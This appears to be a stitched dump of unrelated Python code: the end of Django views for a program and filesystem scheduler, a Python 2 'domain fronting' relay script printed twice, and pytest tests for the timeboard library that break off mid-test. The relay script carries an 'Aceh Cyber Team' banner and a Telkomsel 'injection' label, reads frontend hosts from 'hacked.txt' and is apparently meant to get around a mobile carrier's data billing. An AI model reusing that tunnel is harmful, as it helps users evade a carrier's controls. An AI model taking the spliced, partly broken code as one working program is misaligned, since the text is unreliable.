    GET returns the script as JSON; the query parameters ``slaves``,
    ``programs`` and ``filesystems`` (default ``'int'``) choose whether
    the referenced models are encoded as names or indices.  PUT replaces
    the script from the request body, DELETE removes it.  Other methods
    yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method == 'GET':
        try:
            # ?slaves=...&programs=...&filesystems=... select the JSON
            # encoding of the referenced models.
            script = Script.from_model(
                script_id,
                request.GET.get('slaves', 'int'),
                request.GET.get('programs', 'int'),
                request.GET.get('filesystems', 'int'),
            )
            return StatusResponse.ok(dict(script))
        except FsimError as err:
            return StatusResponse(err)
        except ScriptModel.DoesNotExist as err:
            return StatusResponse(ScriptNotExistError(err, script_id))
    if request.method == 'PUT':
        return script_put_post(request.body.decode('utf-8'), int(script_id))
    if request.method == 'DELETE':
        try:
            ScriptModel.objects.get(id=script_id).delete()
        except ScriptModel.DoesNotExist as err:
            return StatusResponse(ScriptNotExistError(err, script_id))
        return StatusResponse.ok('')
    return HttpResponseForbidden()
def script_copy(request, script_id):
    """Create a deep copy of a `ScriptModel` (POST only).

    Delegates to `script_deep_copy`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        script_deep_copy(ScriptModel.objects.get(id=script_id))
        return StatusResponse.ok('')
    except ScriptModel.DoesNotExist as err:
        return StatusResponse(ScriptNotExistError(err, script_id))
def script_run(request, script_id):
    """Schedule a `ScriptModel` for execution (POST only).

    The script is only started when no other initialized script is
    currently running; otherwise a `ScriptRunningError` status is
    returned.  Other methods yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        script = ScriptModel.objects.get(id=script_id)
        # Refuse to start while another script is still executing.
        already_running = ScriptModel.objects.filter(
            is_running=True, is_initialized=True).exists()
        if already_running:
            return StatusResponse(ScriptRunningError(str(script.name)))
        FSIM_CURRENT_SCHEDULER.start(script.id)
        FSIM_CURRENT_SCHEDULER.notify()
        return StatusResponse.ok('')
    except ScriptModel.DoesNotExist as err:
        return StatusResponse(ScriptNotExistError(err, script_id))
def script_stop(request):
    """Stop the currently scheduled script (POST only).

    Signals the scheduler to stop and wakes it up.  Other methods yield
    an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    FSIM_CURRENT_SCHEDULER.stop()
    FSIM_CURRENT_SCHEDULER.notify()
    return StatusResponse.ok('')
def script_set_default(request, script_id):
    """Mark a `ScriptModel` as the last started script (POST only).

    Other methods yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    ScriptModel.set_last_started(script_id)
    return StatusResponse.ok('')
def filesystem_set(request):
    """Handle collection-level requests for `FilesystemModel`s.

    POST creates a new filesystem entry.  GET supports ``?q=<text>``
    (substring search on the name) and
    ``?slave=<id-or-name>&is_string=<bool>`` (all filesystems of one
    slave).  Other methods yield an `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method == 'POST':
        form = FilesystemForm(request.POST or None)
        if form.is_valid():
            filesystem = form.save(commit=False)
            filesystem.slave = form.cleaned_data['slave']
            try:
                filesystem.full_clean()
                # IMPORTANT: remove trailing path seperator (if not the query
                # will not work [the query in filesystem_move])
                filesystem.destination_path = up.remove_trailing_path_seperator(
                    filesystem.destination_path)
                filesystem.source_path = up.remove_trailing_path_seperator(
                    filesystem.source_path)
                form.save()
                return StatusResponse.ok("")
            except ValidationError as err:
                LOGGER.warning(
                    "Error while adding filesystem `%s`: %s",
                    filesystem.name,
                    err,
                )
                # BUGFIX: use .get() — a validation failure outside
                # '__all__' previously raised KeyError here.
                string = err.message_dict.get('__all__', [''])[0]
                if 'Source path' in string and 'Destination path' in string and 'Slave' in string:
                    error_msg = 'Filesystem with this source path and destination path already exists on this Client.'
                    error_dict = {
                        'source_path': [error_msg],
                        'destination_path': [error_msg],
                    }
                elif 'Name' in string and 'Slave' in string:
                    error_dict = {
                        'name': [
                            'Filesystem with this Name already exists on this Client.'
                        ]
                    }
                else:
                    # BUGFIX: `error_dict` was unbound for any other
                    # validation failure (UnboundLocalError -> 500);
                    # fall back to the raw validation messages.
                    error_dict = err.message_dict
                return StatusResponse.err(error_dict)
        else:
            return StatusResponse.err(form.errors)
    elif request.method == 'GET':
        query = request.GET.get('q', None)
        slave = request.GET.get('slave', None)
        slave_str = request.GET.get('is_string', False)
        if query is not None:
            filesystems = FilesystemModel.objects.filter(
                name__contains=query).values_list(
                    "name",
                    flat=True,
                )
        elif slave is not None:
            if slave_str:
                slave_str = convert_str_to_bool(slave_str)
            try:
                slave = SlaveModel.from_identifier(slave, slave_str)
            except FsimError as err:
                return StatusResponse(err)
            except SlaveModel.DoesNotExist as err:
                return StatusResponse(SlaveNotExistError(err, slave))
            filesystems = FilesystemModel.objects.filter(
                slave=slave).values_list(
                    "name",
                    flat=True,
                )
        else:
            filesystems = FilesystemModel.objects.all().values_list(
                "name",
                flat=True,
            )
        return StatusResponse.ok(list(filesystems))
    else:
        return HttpResponseForbidden()
def filesystem_move(request, filesystem_id):
    """Apply (move) a filesystem entry on its client (POST only).

    Delegates to `fs_move`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        filesystem = FilesystemModel.objects.get(id=filesystem_id)
        try:
            fs_move(filesystem)
            return StatusResponse(Status.ok(""))
        except FsimError as err:
            return StatusResponse(err)
    except FilesystemModel.DoesNotExist as err:
        return StatusResponse(FilesystemNotExistError(err, filesystem_id))
def filesystem_restore(request, filesystem_id):
    """Restore a filesystem entry on its client (POST only).

    Delegates to `fs_restore`.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    try:
        filesystem = FilesystemModel.objects.get(id=filesystem_id)
        try:
            fs_restore(filesystem)
            return StatusResponse(Status.ok(""))
        except FsimError as err:
            return StatusResponse(err)
    except FilesystemModel.DoesNotExist as err:
        return StatusResponse(FilesystemNotExistError(err, filesystem_id))
def filesystem_entry(request, filesystem_id):
    """Handle requests addressing a single `FilesystemModel`.

    DELETE removes the entry given by `filesystem_id` via `fs_delete`;
    PUT updates it from the request body.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method == 'DELETE':
        try:
            filesystem = FilesystemModel.objects.get(id=filesystem_id)
            try:
                fs_delete(filesystem)
                return StatusResponse.ok("")
            except FsimError as err:
                return StatusResponse(err)
        except FilesystemModel.DoesNotExist as err:
            return StatusResponse(FilesystemNotExistError(err, filesystem_id))
    if request.method == 'PUT':
        try:
            # request.PUT does not exist, so rebuild the form data from
            # the raw body and bind it to the existing instance.
            model = FilesystemModel.objects.get(id=filesystem_id)
            form = FilesystemForm(QueryDict(request.body), instance=model)
            if not form.is_valid():
                return StatusResponse(Status.err(form.errors))
            filesystem = form.save(commit=False)
            try:
                filesystem.full_clean()
                form.save()
                return StatusResponse.ok('')
            except ValidationError as _:
                return StatusResponse(Status.err({
                    'name': [
                        'Filesystem with this Name already exists on this Client.'
                    ]
                }))
        except FilesystemModel.DoesNotExist as err:
            return StatusResponse(FilesystemNotExistError(err, filesystem_id))
    return HttpResponseForbidden()
def scope_operations(request):
    """Wind down programs/filesystems/clients in the requested scope (POST only).

    Stops the scheduler and launches a `ShutdownThread` for the scope
    named in ``request.POST['scope']``.  Other methods yield an
    `HttpResponseForbidden`.

    Parameters
    ----------
    request: HttpRequest
        The request which should be processed.

    Returns
    -------
    HttpResponse
    """
    if request.method != 'POST':
        return HttpResponseForbidden()
    FSIM_CURRENT_SCHEDULER.stop()
    FSIM_CURRENT_SCHEDULER.notify()
    worker = ShutdownThread(request.POST['scope'])
    worker.start()
    return StatusResponse.ok('')
class ShutdownThread(threading.Thread):
    """Background worker that winds the system down in stages.

    Depending on ``scope`` it stops all running programs
    (``'programs'``), additionally restores moved filesystems
    (``'filesystem'``), additionally shuts down online clients
    (``'clients'``), and for any other scope finally powers off the
    local machine as well.
    """

    def __init__(self, scope):
        threading.Thread.__init__(self)
        # One of 'programs', 'filesystem', 'clients', or anything else
        # (= full shutdown including this machine).
        self.scope = scope

    def run(self):  # pragma: no cover
        s = sched.scheduler()
        # Stage 1: stop every running program, staggered one second apart.
        programs = filter(lambda x: x.is_running, ProgramModel.objects.all())
        delay = 0
        for program in programs:
            s.enter(delay, 2, prog_stop, argument=(program, ))
            delay += 1
        if self.scope == 'programs':
            s.run()
            return
        # Stage 2: restore every moved filesystem after a grace period.
        filesystems = filter(lambda x: x.is_moved,
                             FilesystemModel.objects.all())
        delay += 10
        for filesystem in filesystems:
            s.enter(delay, 1, fs_restore, argument=(filesystem, ))
        if self.scope == 'filesystem':
            s.run()
            return
        # Stage 3: shut down every online client, staggered one second apart.
        slaves = filter(lambda x: x.is_online, SlaveModel.objects.all())
        delay += 8
        for slave in slaves:
            s.enter(delay, 3, controller.slave_shutdown, argument=(slave, ))
            delay += 1
        if self.scope == 'clients':
            s.run()
            return
        s.run()
        # Finally power off the local machine.
        if platform.system() == "Windows":
            subprocess.run(['shutdown', '-s', '-t', '0'])
        else:
            # BUGFIX: without a shell, '-h' and 'now' must be separate
            # argv entries; the single argument '-h now' was rejected by
            # the shutdown binary.
            subprocess.run(['shutdown', '-h', 'now'])
import os
import sys
import random
import socket
import select
import datetime
import threading
# Re-entrant lock serialising console writes from multiple threads;
# then clear the terminal on start-up.
lock = threading.RLock(); os.system('cls' if os.name == 'nt' else 'clear')
def real_path(file_name):
    """Return *file_name* appended to this script's directory.

    *file_name* is expected to start with a path separator
    (e.g. ``'/hacked.txt'``); plain string concatenation keeps that
    contract intact.
    """
    script_dir = os.path.dirname(os.path.abspath(__file__))
    return script_dir + file_name
def filter_array(array):
    """Strip each entry and drop blanks and ``#`` comment lines.

    Entries are stripped of surrounding whitespace before the comment
    check, so ``'  # comment'`` also counts as a comment.  Unlike the
    previous version, the input list is no longer mutated in place; a
    new list is returned (all in-repo callers rebind the return value).
    """
    stripped = (entry.strip() for entry in array)
    return [entry for entry in stripped
            if entry and not entry.startswith('#')]
def colors(value):
    """Expand ``[XY]`` colour tags in *value* to ANSI escape codes."""
    patterns = {
        'R1': '\033[31;1m', 'R2': '\033[31;2m',
        'G1': '\033[32;1m', 'Y1': '\033[33;1m',
        'P1': '\033[35;1m', 'CC': '\033[0m',
    }
    for code, escape in patterns.items():
        value = value.replace('[' + code + ']', escape)
    return value
def log(value, status='', color='[G1]'):
    """Print a timestamped, colourised status line (thread-safe)."""
    stamp = datetime.datetime.now().strftime('%H:%M:%S')
    line = colors('{color}[{time}] [CC]:: Ro0T {color}{status} [CC]:: {color}{value}[CC]'.format(
        time=stamp,
        value=value,
        color=color,
        status=status
    ))
    with lock:
        print(line)
def log_replace(value, status='Ro0T N3T', color='[G1]'):
    """Overwrite the current console line with a short status message."""
    text = colors('{}{} ({}) [CC]\r'.format(color, status, value))
    with lock:
        sys.stdout.write(text)
        sys.stdout.flush()
class inject(object):
    """Local TCP listener that hands every client to a `domain_fronting`
    relay thread."""

    def __init__(self, inject_host, inject_port):
        super(inject, self).__init__()
        self.inject_host = str(inject_host)
        self.inject_port = int(inject_port)

    def log(self, value, color='[G1]'):
        log(value, color=color)

    def start(self):
        """Bind the listener and accept clients forever; any failure is
        reported once and the loop ends."""
        try:
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server.bind((self.inject_host, self.inject_port))
            server.listen(1)
            domains = filter_array(open(real_path('/hacked.txt')).readlines())
            if not domains:
                self.log('Frontend Domains not found. Please check hacked.txt', color='[R1]')
                return
            self.log('Welcome ACT\nLOCAL HOST : 127.0.0.1\nLOCAL PORT : 1234\nSCRIPT SIAP DIJALANKAN \nSILAHKAN BUKA PSIPHON!!!'.format(self.inject_host, self.inject_port))
            while True:
                client, _ = server.accept()
                # Discard the client's initial request bytes.
                client.recv(4096)
                domain_fronting(client, domains).start()
        except Exception as exception:
            self.log('Gagal!!!Coba Restar HP'.format(self.inject_host, self.inject_port), color='[R1]')
class domain_fronting(threading.Thread):
    """Daemon thread relaying one accepted client connection through a
    randomly chosen frontend domain."""
    def __init__(self, socket_client, frontend_domains):
        super(domain_fronting, self).__init__()
        # Candidate "host[:port]" strings; one is picked per connection.
        self.frontend_domains = frontend_domains
        self.socket_tunnel = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket_client = socket_client
        self.buffer_size = 9999
        self.daemon = True
    def log(self, value, status='N3T', color='[G1]'):
        log(value, status=status, color=color)
    def handler(self, socket_tunnel, socket_client, buffer_size):
        """Pump bytes in both directions until a socket error or ~60
        consecutive 3-second select rounds without traffic."""
        sockets = [socket_tunnel, socket_client]
        timeout = 0
        while True:
            timeout += 1
            socket_io, _, errors = select.select(sockets, [], sockets, 3)
            if errors: break
            if socket_io:
                for sock in socket_io:
                    try:
                        data = sock.recv(buffer_size)
                        # NOTE(review): this `break` only leaves the inner
                        # `for`; on EOF the outer `while` keeps running and
                        # exits via the timeout counter, not immediately.
                        if not data: break
                        # SENT -> RECEIVED
                        elif sock is socket_client:
                            socket_tunnel.sendall(data)
                        elif sock is socket_tunnel:
                            socket_client.sendall(data)
                        # Any successful relay resets the inactivity counter.
                        timeout = 0
                    except: break
            if timeout == 60: break
    def run(self):
        try:
            # Pick a random "host[:port]" entry; port defaults to 443.
            self.proxy_host_port = random.choice(self.frontend_domains).split(':')
            self.proxy_host = self.proxy_host_port[0]
            self.proxy_port = self.proxy_host_port[1] if len(self.proxy_host_port) >= 2 and self.proxy_host_port[1] else '443'
            self.log('[CC]CONNECTING...!!!'.format(self.proxy_host, self.proxy_port))
            self.socket_tunnel.connect((str(self.proxy_host), int(self.proxy_port)))
            # Tell the local client the tunnel is up before relaying.
            self.socket_client.sendall(b'HTTP/1.1 200 OK\r\n\r\n')
            self.handler(self.socket_tunnel, self.socket_client, self.buffer_size)
            self.socket_client.close()
            self.socket_tunnel.close()
            self.log('SUKSES 200 OK!!!'.format(self.proxy_host, self.proxy_port), color='[G1]')
        except OSError:
            self.log('Connection error', color='[CC]')
        # NOTE(review): on Python 3, TimeoutError subclasses OSError, so
        # this branch is unreachable there.
        except TimeoutError:
            self.log('{} not responding'.format(self.proxy_host), color='[CC]')
# Start-up banner.
# NOTE(review): `print G + ...` is Python 2 statement syntax, so this file
# only runs under Python 2.  Also, the list below is missing commas after
# each '[CC]' literal, so adjacent string literals are implicitly
# concatenated with the next line's text — presumably unintended; confirm
# before "fixing".
G = '\033[1;33m'
print G + 'FAST CONECT Aceh Cyber Team\n'
print(colors('\n'.join([
    '[G1][!]Domain Frontin By Ro0T N3T','[CC]'
    '[G1][!]Remode By :ACT','[CC]'
    '[G1][!]Injection :Telkomsel Opok','[CC]'
    '[G1][!]YouTube Chanel :Risky Channel','[CC]'
])))
def main():
    """Prompt for the hard-coded access code and start the local injector
    on 127.0.0.1:8787.

    NOTE(review): uses Python 2 ``raw_input``/``print`` statement syntax,
    so this entry point only runs under Python 2.
    """
    D = ' [G1][!] MASUKKAN Anka 1'  # unused prompt text (kept as-is)
    like = '1'  # the expected access code
    user_input = raw_input(' [!] INPUT ANKA : ')
    if user_input != like:
        sys.exit(' [!] PASSWORD SALAH\n')
    print ' [!] PASSWORD DI TERIMA\n'
    inject('127.0.0.1', '8787').start()
if __name__ == '__main__':
main() | app.py | import os
import sys
import random
import socket
import select
import datetime
import threading
# Re-entrant lock serialising console writes from multiple threads;
# then clear the terminal on start-up.
lock = threading.RLock(); os.system('cls' if os.name == 'nt' else 'clear')
def real_path(file_name):
    """Return *file_name* appended to this script's directory.

    *file_name* is expected to start with a path separator
    (e.g. ``'/hacked.txt'``); plain string concatenation keeps that
    contract intact.
    """
    script_dir = os.path.dirname(os.path.abspath(__file__))
    return script_dir + file_name
def filter_array(array):
    """Strip each entry and drop blanks and ``#`` comment lines.

    Entries are stripped of surrounding whitespace before the comment
    check, so ``'  # comment'`` also counts as a comment.  Unlike the
    previous version, the input list is no longer mutated in place; a
    new list is returned (all in-repo callers rebind the return value).
    """
    stripped = (entry.strip() for entry in array)
    return [entry for entry in stripped
            if entry and not entry.startswith('#')]
def colors(value):
    """Expand ``[XY]`` colour tags in *value* to ANSI escape codes."""
    patterns = {
        'R1': '\033[31;1m', 'R2': '\033[31;2m',
        'G1': '\033[32;1m', 'Y1': '\033[33;1m',
        'P1': '\033[35;1m', 'CC': '\033[0m',
    }
    for code, escape in patterns.items():
        value = value.replace('[' + code + ']', escape)
    return value
def log(value, status='', color='[G1]'):
    """Print a timestamped, colourised status line (thread-safe)."""
    stamp = datetime.datetime.now().strftime('%H:%M:%S')
    line = colors('{color}[{time}] [CC]:: Ro0T {color}{status} [CC]:: {color}{value}[CC]'.format(
        time=stamp,
        value=value,
        color=color,
        status=status
    ))
    with lock:
        print(line)
def log_replace(value, status='Ro0T N3T', color='[G1]'):
    """Overwrite the current console line with a short status message."""
    text = colors('{}{} ({}) [CC]\r'.format(color, status, value))
    with lock:
        sys.stdout.write(text)
        sys.stdout.flush()
class inject(object):
    """Local TCP listener that hands every client to a `domain_fronting`
    relay thread."""

    def __init__(self, inject_host, inject_port):
        super(inject, self).__init__()
        self.inject_host = str(inject_host)
        self.inject_port = int(inject_port)

    def log(self, value, color='[G1]'):
        log(value, color=color)

    def start(self):
        """Bind the listener and accept clients forever; any failure is
        reported once and the loop ends."""
        try:
            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server.bind((self.inject_host, self.inject_port))
            server.listen(1)
            domains = filter_array(open(real_path('/hacked.txt')).readlines())
            if not domains:
                self.log('Frontend Domains not found. Please check hacked.txt', color='[R1]')
                return
            self.log('Welcome ACT\nLOCAL HOST : 127.0.0.1\nLOCAL PORT : 1234\nSCRIPT SIAP DIJALANKAN \nSILAHKAN BUKA PSIPHON!!!'.format(self.inject_host, self.inject_port))
            while True:
                client, _ = server.accept()
                # Discard the client's initial request bytes.
                client.recv(4096)
                domain_fronting(client, domains).start()
        except Exception as exception:
            self.log('Gagal!!!Coba Restar HP'.format(self.inject_host, self.inject_port), color='[R1]')
class domain_fronting(threading.Thread):
    """Daemon thread relaying one accepted client connection through a
    randomly chosen frontend domain."""
    def __init__(self, socket_client, frontend_domains):
        super(domain_fronting, self).__init__()
        # Candidate "host[:port]" strings; one is picked per connection.
        self.frontend_domains = frontend_domains
        self.socket_tunnel = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket_client = socket_client
        self.buffer_size = 9999
        self.daemon = True
    def log(self, value, status='N3T', color='[G1]'):
        log(value, status=status, color=color)
    def handler(self, socket_tunnel, socket_client, buffer_size):
        """Pump bytes in both directions until a socket error or ~60
        consecutive 3-second select rounds without traffic."""
        sockets = [socket_tunnel, socket_client]
        timeout = 0
        while True:
            timeout += 1
            socket_io, _, errors = select.select(sockets, [], sockets, 3)
            if errors: break
            if socket_io:
                for sock in socket_io:
                    try:
                        data = sock.recv(buffer_size)
                        # NOTE(review): this `break` only leaves the inner
                        # `for`; on EOF the outer `while` keeps running and
                        # exits via the timeout counter, not immediately.
                        if not data: break
                        # SENT -> RECEIVED
                        elif sock is socket_client:
                            socket_tunnel.sendall(data)
                        elif sock is socket_tunnel:
                            socket_client.sendall(data)
                        # Any successful relay resets the inactivity counter.
                        timeout = 0
                    except: break
            if timeout == 60: break
    def run(self):
        try:
            # Pick a random "host[:port]" entry; port defaults to 443.
            self.proxy_host_port = random.choice(self.frontend_domains).split(':')
            self.proxy_host = self.proxy_host_port[0]
            self.proxy_port = self.proxy_host_port[1] if len(self.proxy_host_port) >= 2 and self.proxy_host_port[1] else '443'
            self.log('[CC]CONNECTING...!!!'.format(self.proxy_host, self.proxy_port))
            self.socket_tunnel.connect((str(self.proxy_host), int(self.proxy_port)))
            # Tell the local client the tunnel is up before relaying.
            self.socket_client.sendall(b'HTTP/1.1 200 OK\r\n\r\n')
            self.handler(self.socket_tunnel, self.socket_client, self.buffer_size)
            self.socket_client.close()
            self.socket_tunnel.close()
            self.log('SUKSES 200 OK!!!'.format(self.proxy_host, self.proxy_port), color='[G1]')
        except OSError:
            self.log('Connection error', color='[CC]')
        # NOTE(review): on Python 3, TimeoutError subclasses OSError, so
        # this branch is unreachable there.
        except TimeoutError:
            self.log('{} not responding'.format(self.proxy_host), color='[CC]')
# Start-up banner.
# NOTE(review): `print G + ...` is Python 2 statement syntax, so this file
# only runs under Python 2.  Also, the list below is missing commas after
# each '[CC]' literal, so adjacent string literals are implicitly
# concatenated with the next line's text — presumably unintended; confirm
# before "fixing".
G = '\033[1;33m'
print G + 'FAST CONECT Aceh Cyber Team\n'
print(colors('\n'.join([
    '[G1][!]Domain Frontin By Ro0T N3T','[CC]'
    '[G1][!]Remode By :ACT','[CC]'
    '[G1][!]Injection :Telkomsel Opok','[CC]'
    '[G1][!]YouTube Chanel :Risky Channel','[CC]'
])))
def main():
    """Prompt for the hard-coded access code and start the local injector
    on 127.0.0.1:8787.

    NOTE(review): uses Python 2 ``raw_input``/``print`` statement syntax,
    so this entry point only runs under Python 2.
    """
    D = ' [G1][!] MASUKKAN Anka 1'  # unused prompt text (kept as-is)
    like = '1'  # the expected access code
    user_input = raw_input(' [!] INPUT ANKA : ')
    if user_input != like:
        sys.exit(' [!] PASSWORD SALAH\n')
    print ' [!] PASSWORD DI TERIMA\n'
    inject('127.0.0.1', '8787').start()
if __name__ == '__main__':
main() | 0.103635 | 0.089733 |
import timeboard as tb
import datetime
import pytest
import pandas as pd
class TestVersion(object):
    """Ensure the packaged version string matches VERSION.txt."""

    def test_version(self):
        assert tb.read_from('VERSION.txt') == tb.__version__
class TestTBConstructor(object):
    """Constructor-level tests for tb.Timeboard: layouts, amendments,
    and duty selectors over a fixed 12-day calendar (01-12 Jan 2017)."""

    def test_tb_constructor_trivial(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[1])
        # A one-element layout is recycled over all 12 base units.
        assert clnd._timeline.labels.eq([1]*12).all()
        assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
        # end_time falls within the last day: after 23:59:59 on Jan 12 but
        # strictly before midnight of Jan 13.
        assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
        assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
        assert clnd.base_unit_freq == 'D'

    def test_tb_constructor_empty_layout(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[],
                            )
        # With an empty layout and no default label, all labels are null.
        assert clnd._timeline.labels.isnull().all()
        assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
        assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
        assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
        assert clnd.base_unit_freq == 'D'

    def test_tb_constructor_empty_layout_with_default_label(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[],
                            default_label=100)
        # default_label fills every workshift when the layout is empty.
        assert clnd._timeline.labels.eq([100]*12).all()
        assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
        assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
        assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
        assert clnd.base_unit_freq == 'D'

    def test_tb_constructor_trivial_with_amendments(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[1],
                            amendments={'11 Jan 2017': 2,
                                        '12 Jan 2017': 3})
        # Amendments override the layout label on the given days.
        assert clnd._timeline.labels.eq([1]*10 + [2,3]).all()
        assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
        assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
        assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
        assert clnd.base_unit_freq == 'D'

    def test_tb_constructor_amendments_outside(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[1],
                            amendments={'31 Dec 2016': 2,
                                        '12 Jan 2017': 3})
        # An amendment outside (start, end) is silently ignored.
        assert clnd._timeline.labels.eq([1]*11 + [3]).all()
        assert clnd.start_time == datetime.datetime(2017, 1, 1, 0, 0, 0)
        assert clnd.end_time > datetime.datetime(2017, 1, 12, 23, 59, 59)
        assert clnd.end_time < datetime.datetime(2017, 1, 13, 0, 0, 0)
        assert clnd.base_unit_freq == 'D'

    def test_tb_constructor_bad_layout(self):
        # A scalar (non-iterable) layout is rejected.
        with pytest.raises(TypeError):
            tb.Timeboard(base_unit_freq='D',
                         start='01 Jan 2017', end='12 Jan 2017',
                         layout=1)

    def test_tb_constructor_duplicate_amendments(self):
        # Two amendments falling into the same base unit (same day) clash.
        with pytest.raises(KeyError):
            tb.Timeboard(base_unit_freq='D',
                         start='01 Jan 2017', end='12 Jan 2017',
                         layout=[1],
                         amendments={'02 Jan 2017 12:00': 2,
                                     '02 Jan 2017 15:15': 3})

    def test_tb_constructor_bad_amendments(self):
        # Amendments must be a mapping, not a list.
        with pytest.raises(TypeError):
            tb.Timeboard(base_unit_freq='D',
                         start='01 Jan 2017', end='12 Jan 2017',
                         layout=[1],
                         amendments=[0])

    def test_tb_constructor_trivial_selector(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[0, 1, 0, 2])
        sdl = clnd.default_schedule
        selector = clnd.default_selector
        # Default selector treats truthy labels (1, 2) as on duty.
        assert selector(clnd._timeline[1])
        assert [selector(x) for x in clnd._timeline.labels] == [False, True] * 6
        assert (sdl.on_duty_index == [1, 3, 5, 7, 9, 11]).all()
        assert (sdl.off_duty_index == [0, 2, 4, 6, 8, 10]).all()

    def test_tb_constructor_trivial_custom_selector(self):
        def custom_selector(x):
            return x>1
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='01 Jan 2017', end='12 Jan 2017',
                            layout=[0, 1, 0, 2],
                            default_selector=custom_selector)
        sdl = clnd.default_schedule
        selector = clnd.default_selector
        # With the custom selector only label 2 counts as on duty.
        assert not selector(clnd._timeline[1])
        assert [selector(x) for x in clnd._timeline.labels] == [False, False,
                                                                False, True] * 3
        assert (sdl.on_duty_index == [3, 7, 11]).all()
        assert (sdl.off_duty_index == [0, 1, 2, 4, 5, 6, 8, 9, 10]).all()
class TestTBConstructorWithOrgs(object):
    """Constructor test using an Organizer: a standard 5x8 business week."""

    def test_tb_constructor_week5x8(self):
        # Mon-Fri on duty (1), Sat-Sun off (0), repeated weekly ('W' marker).
        week5x8 = tb.Organizer(marker='W', structure=[[1, 1, 1, 1, 1, 0, 0]])
        # Amendments force 01-10 Jan 2017 off duty.
        amendments = pd.Series(index=pd.date_range(start='01 Jan 2017',
                                                   end='10 Jan 2017',
                                                   freq='D'),
                               data=0).to_dict()
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='28 Dec 2016', end='02 Apr 2017',
                            layout=week5x8,
                            amendments=amendments)
        assert clnd.start_time == datetime.datetime(2016, 12, 28, 0, 0, 0)
        assert clnd.end_time > datetime.datetime(2017, 4, 2, 23, 59, 59)
        assert clnd.end_time < datetime.datetime(2017, 4, 3, 0, 0, 0)
        assert clnd.base_unit_freq == 'D'
        assert clnd('28 Dec 2016').is_on_duty()
        assert clnd('30 Dec 2016').is_on_duty()
        # 31 Dec 2016 is a Saturday.
        assert clnd('31 Dec 2016').is_off_duty()
        assert clnd('01 Jan 2017').is_off_duty()
        # Last amended (forced off) day.
        assert clnd('10 Jan 2017').is_off_duty()
        assert clnd('11 Jan 2017').is_on_duty()
        assert clnd('27 Mar 2017').is_on_duty()
        assert clnd('31 Mar 2017').is_on_duty()
        assert clnd('01 Apr 2017').is_off_duty()
        assert clnd('02 Apr 2017').is_off_duty()
class TestTimeboardSchedules(object):
    """Tests for adding, dropping, naming and validating schedules."""

    def test_tb_add_schedule(self):
        clnd = tb.Timeboard(base_unit_freq='D',
                            start='31 Dec 2016', end='12 Jan 2017',
                            #layout=[0, 1, 0, 0, 2, 0])
                            layout=['O', 'A', 'O', 'O', 'B', 'O'])
        # A timeboard always starts with the default 'on_duty' schedule.
        assert len(clnd.schedules) == 1
        assert 'on_duty' in clnd.schedules
        clnd.add_schedule(name='sdl1', selector=lambda x: x == 'B')
        clnd.add_schedule(name='sdl2', selector=lambda x: x == 'C')
        assert len(clnd.schedules) == 3
        assert 'sdl1' in clnd.schedules
        sdl1 = clnd.schedules['sdl1']
        assert sdl1.name == 'sdl1'
        # 'B' occurs only at position 4 in the layout.
        assert not sdl1.is_on_duty(1)
        assert sdl1.is_on_duty(4)
        assert 'sdl2' in clnd.schedules
        sdl2 = clnd.schedules['sdl2']
        assert sdl2.name == 'sdl2'
        # 'C' never occurs in the layout, so sdl2 has no on-duty workshifts.
